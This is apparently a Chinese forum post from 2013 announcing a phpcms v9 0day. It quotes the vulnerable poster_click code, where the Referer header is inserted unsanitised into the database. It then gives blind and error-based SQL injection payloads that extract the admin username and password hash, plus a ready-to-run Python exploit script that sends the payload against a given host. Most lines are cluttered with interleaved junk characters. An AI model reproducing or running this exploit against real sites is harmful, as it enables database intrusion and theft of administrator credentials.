有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
; o& h3 D5 i/ ?- ^( D: S) N
/ c$ R0 j6 Z5 O6 k! `" g1 }问题函数\phpcms\modules\poster\index.php
! P# E% d }& i I+ R& Z* c
4 @/ ~4 r. R& [& Z. Apublic function poster_click() {
6 B, V$ B. i! h* }- ?$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 c$ z* B n" t" k$r = $this->db->get_one(array('id'=>$id));
+ p4 s+ p* d3 R0 G! \if (!is_array($r) && empty($r)) return false;& w2 `; j1 I( C4 ~- d- U! i* o% S
$ip_area = pc_base::load_sys_class('ip_area');# n" W9 y3 U+ m2 V" K, T, R
$ip = ip();
4 N( ~% Q, s1 q; q* p1 B( V$area = $ip_area->get($ip);3 L$ W8 M' B( k& W% H/ o8 f( z5 ]
$username = param::get_cookie('username') ? param::get_cookie('username') : ''; s, K# H: a# X6 S# q, c
if($id) {
* R6 Q1 y ~7 ?$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
+ j7 Z+ g1 ]- f7 _$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
c l I b6 n3 l6 t# l}. K' Y: z; g6 G8 N' u# V2 o* Z' ~
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ w0 H: c, j, K! ]! O" I& v$setting = string2array($r['setting']);; b% r: n/ _% x7 u( {' P7 y: o( Z% x
if (count($setting)==1) { P; s$ W( u" X& C- Z' \5 T
$url = $setting['1']['linkurl'];$ q" m+ Y5 P7 Q5 F& ]' z
} else {+ k0 u8 t- g, r) t
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
3 n% d9 k# {9 H/ w3 D4 ]}
9 V* e3 @, L# E- S+ X3 c1 u! pheader('Location: '.$url);
' c9 W( a2 G, Q$ ]}( z6 P; n. x" h
, e2 T' v" k# v3 g* Z 2 Y) W6 v: e' L, Z- F
- N' H! v# B7 i+ a) F0 o利用方式:
' z& [$ _9 E0 A! g X- r/ g+ ~8 P* Y: s1 v; \
1、可以采用盲注入的手法:1 }1 ?# ~8 t5 u; \% G
3 I3 k1 W0 N0 S: B9 ~5 K
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#1 f6 q- W! p+ q' R, A, C" {) X
- E$ u1 f" k! K, `2 {$ V
通过返回页面,正常与否一个个猜解密码字段。* ]+ d3 e# D7 _- J+ w7 B
* c5 a& }3 x9 g; G D7 ?
2、代码是花开写的,随手附上了:
# v8 h6 s3 }* _9 \! I0 R0 g3 Y% g& m M) R6 C
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#' i* r* x0 b; ?8 X% J& v; v
, L, x3 _+ B* V" [; \
此方法是爆错注入手法,原理自查。( W. X, F2 N7 |( z0 Q' l# F, O0 z- [
* ?$ v) M4 q. |- `9 d/ t+ `
* P( ~ e$ L/ ]9 M$ ?! V
" S3 `0 F5 R8 `; d3 G" I7 K利用程序:
2 g( F/ X7 s4 Z
/ d9 y$ d7 ^0 ]8 ?5 e0 N- }( B#!/usr/bin/env python+ j4 L$ m5 l. ^# J& ]7 `+ J
import httplib,sys,re
3 \( e( h+ o& _3 S, {
6 v) o& |! t% U" Xdef attack():8 ]& F* _: W0 A& V+ p
print “Code by Pax.Mac Team conqu3r!”9 l0 @7 ~* \: D1 q
print “Welcome to our zone!!!”
; b5 o; o* X8 ?' V" N7 P9 ~$ Murl=sys.argv[1]
/ M4 j+ `. ?8 l) b( r$ U' opaths=sys.argv[2]. \ L& M; Q6 L+ X; h+ r! x1 e1 P
conn = httplib.HTTPConnection(url)
) v* g E) ?; u2 fi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,& p4 E- q& e1 h& G- n. ? `4 v4 }
“Accept”: “text/plain”,
- k3 Y; h& t6 {5 H. e“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”} e$ C) f2 c" W7 e4 x
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), N; ^) Y/ i/ Z8 N( h( f
r1 = conn.getresponse()# R* q7 P" W3 f: i" d. l6 ]6 C
datas=r1.read()$ ]- M+ H7 b; l5 v
datas=re.findall(r”Duplicate entry \’\w+’”, datas)+ ~! S7 n- M; H8 y0 g( \
print datas[0]- T5 y* t. P( y7 U( ^1 ]% B
conn.close()( z2 u ]! E- V. ?- v' z
if __name__==”__main__”:5 I7 p7 ~% e* O8 B
if len(sys.argv)<3:# v' A) i: x2 N" ? [
print “Code by Pax.Mac Team conqu3r”; O) o% Y! s; x7 V0 P0 \; V$ W, O
print “Usgae:”
* j$ P" J: M7 M/ C' j8 G* O% c8 Sprint “ phpcmsattack.py www.paxmac.org /”
* B+ K- C$ ~! u! \% ^( F# A- Nprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”! O5 z# b. `9 g" x! M2 _
sys.exit(1)
) e6 T! m% Y+ Y2 cattack() m& M S; _; r3 W8 n1 R& E) v
- o3 F+ [, M. p/ X, I
|
发表于 2013-1-11 21:01:00
收藏
支持
反对